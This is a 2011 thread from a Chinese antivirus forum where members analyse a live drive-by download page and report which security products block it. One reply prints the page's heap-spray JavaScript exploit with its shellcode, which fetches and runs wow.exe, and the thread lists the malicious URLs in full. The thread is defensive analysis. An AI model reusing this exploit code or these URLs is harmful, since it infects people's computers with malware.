查看: 3302|回复: 15
收起左侧

[已鉴定] 目前还有效的挂马网页

[复制链接]
wjcharles
发表于 2011-6-25 01:02:43 | 显示全部楼层 |阅读模式
本帖最后由 wjcharles 于 2011-7-4 13:46 编辑

hxxp://web3.fimmu.com/sifa/images/wow.htm?www.3g3h.cn

来自卡卡每日网马,感觉卡卡没分析完整?
[root]http://web3.fimmu.com/sifa/images/wow.htm?www.3g3h.cn
    [iframe]http://web3.fimmu.com/sifa/img/flash.html
[virus]http://web3.fimmu.com/sifa/img/wow.exe
    [script]http://js.users.51.la/4573991.js

为什么我这在IE缓存中出现了nb.swf?

无标题15.png


剑步如飞
发表于 2011-6-25 01:23:24 | 显示全部楼层
KIS 2012 denied!

01.png

02.png
klinxun
发表于 2011-6-25 01:25:08 | 显示全部楼层
趋势本地库搞定。
451102995
发表于 2011-6-25 01:59:39 | 显示全部楼层
PCA...KILL
是昔流芳
发表于 2011-6-25 07:20:47 | 显示全部楼层
恶意代码藏在nb.swf中,MD好像不能很好的解决.
帅就是帅
发表于 2011-6-25 11:14:24 | 显示全部楼层
本帖最后由 帅就是帅 于 2011-6-25 11:19 编辑

其实用户只要知道挂马有威胁而远离恶意页面就够了
也许这就是卡卡只用解出一个网马就行了的原因吧。。。。。话说我也喜欢这么干
卡卡就解了这段shellcode
  1. %u7468%u7074%u2f3a%u772f%u6265%u2e33%u6966%u6d6d%u2e75%u6f63%u2f6d%u6973%u6166%u692f%u676d%u772f%u776f%u652e%u6578%u0000
复制代码
下面还有段需要解密,解后又是一段很古老的shellcode
function nb(){var netboom = unescape('%u9090%u9090%u54eb%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74f2%uc108%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e8b%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u4300%u5c3a%u2e6e%u6373%u0072%uc033%u0364%u3040%u0c78%u408b%u8b0c%u1c70%u8bad%u0840%u09eb%u408b%u8d34%u7c40%u408b%u953c%u8ebf%u0e4e%ue8ec%uff84%uffff%uec83%u8304%u242c%uff3c%u95d0%ubf50%u1a36%u702f%u6fe8%uffff%u8bff%u2454%u8dfc%uba52%udb33%u5353%ueb52%u5324%ud0ff%ubf5d%ufe98%u0e8a%u53e8%uffff%u83ff%u04ec%u2c83%u6224%ud0ff%u7ebf%ue2d8%ue873%uff40%uffff%uff52%ue8d0%uffd7%uffff'+nbcode);var nb=new Array();var nbpower=0x86000-(netboom.length*2);var nblol=unescape('%u0c0c%u0c0c');while(nblol.length<nbpower/2){nblol+=nblol;};var nbwm=nblol.substring(0,nbpower/2);delete nblol;for(i=0;i<270;i++){nb[i]=nbwm+nbwm+netboom;}}nb();document.write("<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="netboom" width="0" height="0" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab"><param name="movie" value="nb.swf" /></object>");
blue_仰望
发表于 2011-6-25 17:18:38 | 显示全部楼层
eav+chrome无反应。
也不知道谁
发表于 2011-6-26 01:17:26 | 显示全部楼层
451102995 发表于 2011-6-25 01:59
PCA...KILL

熊猫云?我这里完全没反应啊
weipengsmile
发表于 2011-6-26 13:48:55 | 显示全部楼层
cav kill
sy0923
发表于 2011-6-26 15:59:18 | 显示全部楼层
小a拦截
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-1 06:36 , Processed in 0.142447 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表